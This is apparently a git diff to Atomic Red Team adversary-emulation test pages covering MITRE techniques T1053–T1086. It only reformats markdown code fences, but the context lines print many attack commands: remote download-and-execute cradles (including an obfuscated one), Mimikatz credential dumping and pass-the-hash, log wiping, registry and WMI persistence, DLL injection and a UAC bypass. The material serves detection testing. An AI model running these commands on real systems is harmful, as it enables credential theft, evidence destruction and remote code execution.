-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
New-Service -Name "#{service_name}" -BinaryPathName "#{binary_path}"
Start-Service -Name "#{service_name}"
Stop-Service -Name "#{service_name}"
diff --git a/atomics/T1053/T1053.md b/atomics/T1053/T1053.md
index 2128963e..c7e828e2 100644
--- a/atomics/T1053/T1053.md
+++ b/atomics/T1053/T1053.md
@@ -22,8 +22,7 @@ Note: deprecated in Windows 8+
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
at 13:20 /interactive cmd
```
@@ -40,8 +39,7 @@ at 13:20 /interactive cmd
| task_command | What you want to execute | String | C:\windows\system32\cmd.exe|
| time | What time 24 Hour | String | 72600|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
```
@@ -62,8 +60,7 @@ Create a task on a remote system
| user_name | Username DOMAIN\User | String | DOMAIN\user|
| password | Password | String | At0micStrong|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
```
diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md
index 84785962..cc1b4048 100644
--- a/atomics/T1055/T1055.md
+++ b/atomics/T1055/T1055.md
@@ -48,8 +48,7 @@ Windows 10 Utility To Inject DLLS
| dll_payload | DLL to Inject | Path | C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll|
| process_id | PID of input_arguments | Int | $pid|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
mavinject $pid /INJECTRUNNING #{dll_payload}
```
@@ -67,8 +66,7 @@ PowerShell Injection using [PowerSploit Invoke-DLLInjection](https://github.com/
| dll_payload | DLL to Inject | Path | T1055.dll|
| process_id | PID of input_arguments | Int | $pid|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Invoke-DllInjection.ps1 -ProcessID #{process_id} -Dll #{dll_payload}
```
@@ -85,8 +83,7 @@ This test adds a shared library to the `ld.so.preload` list to execute and inter
|------|-------------|------|---------------|
| path_to_shared_library | Path to a shared library object | Path | /tmp/evil_module.so|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
echo #{path_to_shared_library} > /etc/ld.so.preload
```
@@ -110,8 +107,7 @@ Excercises Five Techniques
|------|-------------|------|---------------|
| exe_binary | Output Binary | Path | T1055.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
.\bin\#{exe_binary}
```
diff --git a/atomics/T1056/T1056.md b/atomics/T1056/T1056.md
index 7194584c..63326f2d 100644
--- a/atomics/T1056/T1056.md
+++ b/atomics/T1056/T1056.md
@@ -28,8 +28,7 @@ Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/ma
|------|-------------|------|---------------|
| filepath | Name of the local file, include path. | Path | c:\key.log|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
.\Get-Keystrokes.ps1 -LogPath #{filepath}
```
diff --git a/atomics/T1057/T1057.md b/atomics/T1057/T1057.md
index 15500c54..2fbca057 100644
--- a/atomics/T1057/T1057.md
+++ b/atomics/T1057/T1057.md
@@ -28,8 +28,7 @@ Utilize ps to identify processes
|------|-------------|------|---------------|
| output_file | path of output file | path | /tmp/loot.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
ps >> #{output_file}
ps aux >> #{output_file}
```
diff --git a/atomics/T1059/T1059.md b/atomics/T1059/T1059.md
index 77853262..40c6db1f 100644
--- a/atomics/T1059/T1059.md
+++ b/atomics/T1059/T1059.md
@@ -19,8 +19,7 @@ This will download the specified payload and set a marker file in `/tmp/art-fish
**Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash"
bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash"
```
diff --git a/atomics/T1060/T1060.md b/atomics/T1060/T1060.md
index 22e08567..638e038b 100644
--- a/atomics/T1060/T1060.md
+++ b/atomics/T1060/T1060.md
@@ -42,8 +42,7 @@ Run Key Persistence
|------|-------------|------|---------------|
| command_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
```
@@ -61,8 +60,7 @@ RunOnce Key Persistence
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.dll|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
```
@@ -80,8 +78,7 @@ RunOnce Key Persistence via PowerShell
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | powershell.exe|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
@@ -100,8 +97,7 @@ Add Shortcut To Startup via PowerShell
|------|-------------|------|---------------|
| thing_to_execute | Thing to Run | Path | C:\Path\AtomicRedTeam.exe|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$TargetFile = "$env:SystemRoot\System32\#{thing_to_execute}"
$ShortcutFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk"
$WScriptShell = New-Object -ComObject WScript.Shell
diff --git a/atomics/T1062/T1062.md b/atomics/T1062/T1062.md
index 2ad7a808..c32bc853 100644
--- a/atomics/T1062/T1062.md
+++ b/atomics/T1062/T1062.md
@@ -24,8 +24,7 @@ Create a New-VM
| vm_name | Create a new VM. | string | testvm|
| file_location | Location of new VHDX file | string | C:\Temp\test.vhdx|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Get-WindowsFeature -Name Hyper-V -ComputerName #{hostname}
Install-WindowsFeature -Name Hyper-V -ComputerName #{hostname} -IncludeManagementTools
New-VM -Name #{vm_name} -MemoryStartupBytes 1GB -NewVHDPath #{file_location} -NewVHDSizeBytes 21474836480
diff --git a/atomics/T1063/T1063.md b/atomics/T1063/T1063.md
index ec6b93b5..1a7bdae2 100644
--- a/atomics/T1063/T1063.md
+++ b/atomics/T1063/T1063.md
@@ -29,8 +29,7 @@ Methods to identify Security Software on an endpoint
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
netsh.exe advfirewall firewall show all profiles
tasklist.exe
tasklist.exe | findstr /i virus
@@ -47,8 +46,7 @@ Methods to identify Security Software on an endpoint
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
get-process | ?{$_.Description -like "*virus*"}
get-process | ?{$_.Description -like "*carbonblack*"}
get-process | ?{$_.Description -like "*defender*"}
@@ -63,8 +61,7 @@ Methods to identify Security Software on an endpoint
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
ps -ef | grep Little\ Snitch | grep -v grep
ps aux | grep CbOsxSensorService
```
@@ -77,8 +74,7 @@ Discovery of an installed Sysinternals Sysmon service using driver altitude (eve
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
fltmc.exe | findstr.exe 385201
```
diff --git a/atomics/T1064/T1064.md b/atomics/T1064/T1064.md
index 7a363f99..fe2bda2b 100644
--- a/atomics/T1064/T1064.md
+++ b/atomics/T1064/T1064.md
@@ -19,8 +19,7 @@ Creates and executes a simple bash script.
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
sh -c "echo 'ping -c 4 8.8.8.8' >> /tmp/art.sh"
chmod +x /tmp/art.sh
diff --git a/atomics/T1065/T1065.md b/atomics/T1065/T1065.md
index 89643389..4fa3d0a2 100644
--- a/atomics/T1065/T1065.md
+++ b/atomics/T1065/T1065.md
@@ -23,8 +23,7 @@ Testing uncommonly used port utilizing PowerShell
| port | Specify uncommon port number | String | 8081|
| domain | Specify target hostname | String | google.com|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
test-netconnection -ComputerName #{domain} -port #{port}
```
@@ -42,8 +41,7 @@ Testing uncommonly used port utilizing telnet.
| port | Specify uncommon port number | String | 8081|
| domain | Specify target hostname | String | google.com|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
telnet #{domain} #{port}
```
diff --git a/atomics/T1069/T1069.md b/atomics/T1069/T1069.md
index c3914d2a..b07a9673 100644
--- a/atomics/T1069/T1069.md
+++ b/atomics/T1069/T1069.md
@@ -31,8 +31,7 @@ Permission Groups Discovery
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
dscacheutil -q group
dscl . -list /Groups
groups
@@ -46,8 +45,7 @@ Permission Groups Discovery for Windows
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
net localgroup
net group /domain
```
@@ -65,8 +63,7 @@ Permission Groups Discovery utilizing PowerShell
|------|-------------|------|---------------|
| user | User to identify what groups a user is a member of | string | administrator|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
get-localgroup
get-ADPrinicipalGroupMembership #{user} | select name
```
diff --git a/atomics/T1070/T1070.md b/atomics/T1070/T1070.md
index b3b14332..4dbc93ea 100644
--- a/atomics/T1070/T1070.md
+++ b/atomics/T1070/T1070.md
@@ -44,8 +44,7 @@ Clear Windows Event Logs
|------|-------------|------|---------------|
| log_name | Windows Log Name, ex System | String | System|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
wevtutil cl #{log_name}
```
@@ -57,8 +56,7 @@ Manages the update sequence number (USN) change journal, which provides a persis
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
fsutil usn deletejournal /D C:
```
@@ -70,8 +68,7 @@ Delete system and audit logs
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
rm -rf /private/var/log/system.log*
rm -rf /private/var/audit/*
```
@@ -89,8 +86,7 @@ This test overwrites the Linux mail spool of a specified user. This technique wa
|------|-------------|------|---------------|
| username | Username of mail spool | String | root|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
echo 0> /var/spool/mail/#{username}
```
@@ -107,8 +103,7 @@ This test overwrites the specified log. This technique was used by threat actor
|------|-------------|------|---------------|
| log_path | Path of specified log | Path | /var/log/secure|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
echo 0> #{log_path}
```
diff --git a/atomics/T1071/T1071.md b/atomics/T1071/T1071.md
index f8dcf6f8..4af8746c 100644
--- a/atomics/T1071/T1071.md
+++ b/atomics/T1071/T1071.md
@@ -31,8 +31,7 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
Invoke-WebRequest #{domain} -UserAgent "HttpBrowser/1.0" | out-null
Invoke-WebRequest #{domain} -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null
Invoke-WebRequest #{domain} -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null
@@ -53,8 +52,7 @@ Inspired by APTSimulator - https://github.com/NextronSystems/APTSimulator/blob/m
|------|-------------|------|---------------|
| domain | Default domain to simulate against | string | www.google.com|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
curl -s -A "HttpBrowser/1.0" -m3 #{domain}
curl -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 #{domain}
curl -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 #{domain}
@@ -78,8 +76,7 @@ The intent of this test is to trigger threshold based detection on the number of
| query_type | DNS query type | string | TXT|
| query_volume | Number of DNS queries to send | integer | 1000|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
for($i=0; $i -le $#{query_volume}; $i++) { Resolve-DnsName -type "#{query_type}" "#{subdomain}.$(Get-Random -Minimum 1 -Maximum 999999).#{domain}" -QuickTimeout}
```
@@ -102,8 +99,7 @@ This behaviour is typical of implants either in an idle state waiting for instru
| c2_jitter | Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests | integer | 20|
| runtime | Time in minutes to run the simulation | integer | 30|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
.\T1071-dns-beacon.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type} -C2Interval #{c2_interval} -C2Jitter #{c2_jitter} -RunTime #{runtime}
```
@@ -123,8 +119,7 @@ The simulation involves sending DNS queries that gradually increase in length un
| subdomain | Subdomain prepended to the domain name (should be 63 characters to test maximum length) | string | atomicredteamatomicredteamatomicredteamatomicredteamatomicredte|
| query_type | DNS query type | string | TXT|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
.\T1071-dns-domain-length.ps1 -Domain #{domain} -Subdomain #{subdomain} -QueryType #{query_type}
```
diff --git a/atomics/T1074/T1074.md b/atomics/T1074/T1074.md
index e285a19a..1e80f23f 100644
--- a/atomics/T1074/T1074.md
+++ b/atomics/T1074/T1074.md
@@ -19,8 +19,7 @@ Utilize powershell to download discovery.bat and save to a local file
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
```
@@ -32,8 +31,7 @@ Utilize curl to download discovery.sh and execute a basic information gathering
**Supported Platforms:** Linux, macOS
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log
```
diff --git a/atomics/T1075/T1075.md b/atomics/T1075/T1075.md
index 49c3ee8b..8f4e0705 100644
--- a/atomics/T1075/T1075.md
+++ b/atomics/T1075/T1075.md
@@ -25,8 +25,7 @@ Note: must dump hashes first
| domain | domain | string | atomic.local|
| ntlm | ntlm hash | string | cc36cf7a8514893efccd3324464tkg1a|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
```
diff --git a/atomics/T1076/T1076.md b/atomics/T1076/T1076.md
index eb583189..3af227f1 100644
--- a/atomics/T1076/T1076.md
+++ b/atomics/T1076/T1076.md
@@ -19,8 +19,7 @@ RDP hijacking](https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-r
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
net start sesshijack
diff --git a/atomics/T1077/T1077.md b/atomics/T1077/T1077.md
index 4ec1de97..70ff3218 100644
--- a/atomics/T1077/T1077.md
+++ b/atomics/T1077/T1077.md
@@ -29,8 +29,7 @@ Connecting To Remote Shares
| password | Password | String | P@ssw0rd1|
| computer_name | Target Computer Name | String | Target|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
```
@@ -49,8 +48,7 @@ Map Admin share utilizing PowerShell
| computer_name | Target Computer Name | String | Target|
| map_name | Mapped Drive Letter | String | g|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
```
diff --git a/atomics/T1081/T1081.md b/atomics/T1081/T1081.md
index 178e0ad5..1a17db37 100644
--- a/atomics/T1081/T1081.md
+++ b/atomics/T1081/T1081.md
@@ -23,8 +23,7 @@ It is possible to extract passwords from backups or saved virtual machines throu
**Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
python2 laZagne.py all
```
@@ -41,8 +40,7 @@ Extracting credentials from files
|------|-------------|------|---------------|
| file_path | Path to search | String | /|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
grep -riP password #{file_path}
```
@@ -54,8 +52,7 @@ Mimikatz/kittenz - This will require a Mimikatz executable or invoke-mimikittenz
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
invoke-mimikittenz
mimikatz.exe
```
@@ -68,8 +65,7 @@ Extracting Credentials from Files
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
findstr /si pass *.xml | *.doc | *.txt | *.xls
ls -R | select-string -Pattern password
```
diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md
index de37361f..b979ad10 100644
--- a/atomics/T1082/T1082.md
+++ b/atomics/T1082/T1082.md
@@ -31,8 +31,7 @@ Identify System Info
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
systeminfo
reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum
```
@@ -45,8 +44,7 @@ Identify System Info
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
systemsetup
system_profiler
ls -al /Applications
@@ -60,8 +58,7 @@ Identify System Info
**Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
uname -a >> /tmp/loot.txt
cat /etc/lsb-release >> /tmp/loot.txt
cat /etc/redhat-release >> /tmp/loot.txt
@@ -77,8 +74,7 @@ Identify virtual machine hardware. This technique is used by the Pupy RAT and ot
**Supported Platforms:** Linux
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
cat /sys/class/dmi/id/bios_version | grep -i amazon
cat /sys/class/dmi/id/product_name | grep -i "Droplet\|HVM\|VirtualBox\|VMware"
cat /sys/class/dmi/id/chassis_vendor | grep -i "Xen\|Bochs\|QEMU"
@@ -97,8 +93,7 @@ Identify virtual machine guest kernel modules. This technique is used by the Pup
**Supported Platforms:** Linux
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
sudo lsmod | grep -i "vboxsf\|vboxguest"
sudo lsmod | grep -i "vmw_baloon\|vmxnet"
sudo lsmod | grep -i "xen-vbd\|xen-vnif"
diff --git a/atomics/T1083/T1083.md b/atomics/T1083/T1083.md
index 9ca89f5c..64081726 100644
--- a/atomics/T1083/T1083.md
+++ b/atomics/T1083/T1083.md
@@ -29,8 +29,7 @@ Find or discover files on the file system
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
dir /s c:\ >> %temp%\download
dir /s "c:\Documents and Settings" >> %temp%\download
dir /s "c:\Program Files\" >> %temp%\download
@@ -49,8 +48,7 @@ Find or discover files on the file system
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
ls -recurse
get-childitem -recurse
gci -recurse
@@ -70,8 +68,7 @@ https://perishablepress.com/list-files-folders-recursively-terminal/
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
ls -a > allcontents.txt
ls -la /Library/Preferences/ > detailedprefsinfo.txt
file */* *>> ../files.txt
@@ -89,8 +86,7 @@ Find or discover files on the file system
**Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ```
cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt
cat /etc/mtab > /tmp/loot.txt
find . -type f -iname *.pdf > /tmp/loot.txt
diff --git a/atomics/T1084/T1084.md b/atomics/T1084/T1084.md
index bd651fa0..e07b36ed 100644
--- a/atomics/T1084/T1084.md
+++ b/atomics/T1084/T1084.md
@@ -25,8 +25,7 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
EventNameSpace='root\CimV2';
QueryLanguage="WQL";
@@ -58,8 +57,7 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
$FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding"
diff --git a/atomics/T1085/T1085.md b/atomics/T1085/T1085.md
index c700033d..3ca3242e 100644
--- a/atomics/T1085/T1085.md
+++ b/atomics/T1085/T1085.md
@@ -24,8 +24,7 @@ Test execution of a remote script using rundll32.exe
|------|-------------|------|---------------|
| file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/T1085.sct|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();"
```
diff --git a/atomics/T1086/T1086.md b/atomics/T1086/T1086.md
index caa00b85..56dbeb9b 100644
--- a/atomics/T1086/T1086.md
+++ b/atomics/T1086/T1086.md
@@ -50,8 +50,7 @@ Download Mimikatz and dump credentials
|------|-------------|------|---------------|
| mimurl | Mimikatz url | url | https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
```
@@ -68,8 +67,7 @@ Download Bloodhound and run it
|------|-------------|------|---------------|
| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
```
@@ -82,8 +80,7 @@ Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FR
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))
(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs()
Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value)))
@@ -97,8 +94,7 @@ Run mimikatz via PsSendKeys
**Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
$url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
```
@@ -112,8 +108,7 @@ Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-pat
**Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/master/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
```
@@ -133,8 +128,7 @@ Using PS 5.1, add a user via CLI
| password | password to use | string | ATOM1CR3DT3@M|
| description | Brief description of account | string | Atomic Things|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
New-LocalUser -FullName '#{full_name}' -Name '#{user_name}' -Password #{password} -Description '#{description}'
```
@@ -153,8 +147,7 @@ Not proxy aware removing cache although does not appear to write to those locati
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
@@ -173,8 +166,7 @@ Not proxy aware removing cache although does not appear to write to those locati
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
```
@@ -192,8 +184,7 @@ Powershell xml download request
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
```
@@ -211,8 +202,7 @@ Powershell invoke mshta to download payload
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
```
@@ -225,8 +215,7 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
**Supported Platforms:** Windows
-#### Run it with these steps!
-1. Open Powershell_ise as a Privileged Account
+#### Run it with these steps! 1. Open Powershell_ise as a Privileged Account
2. Invoke-DownloadCradle.ps1
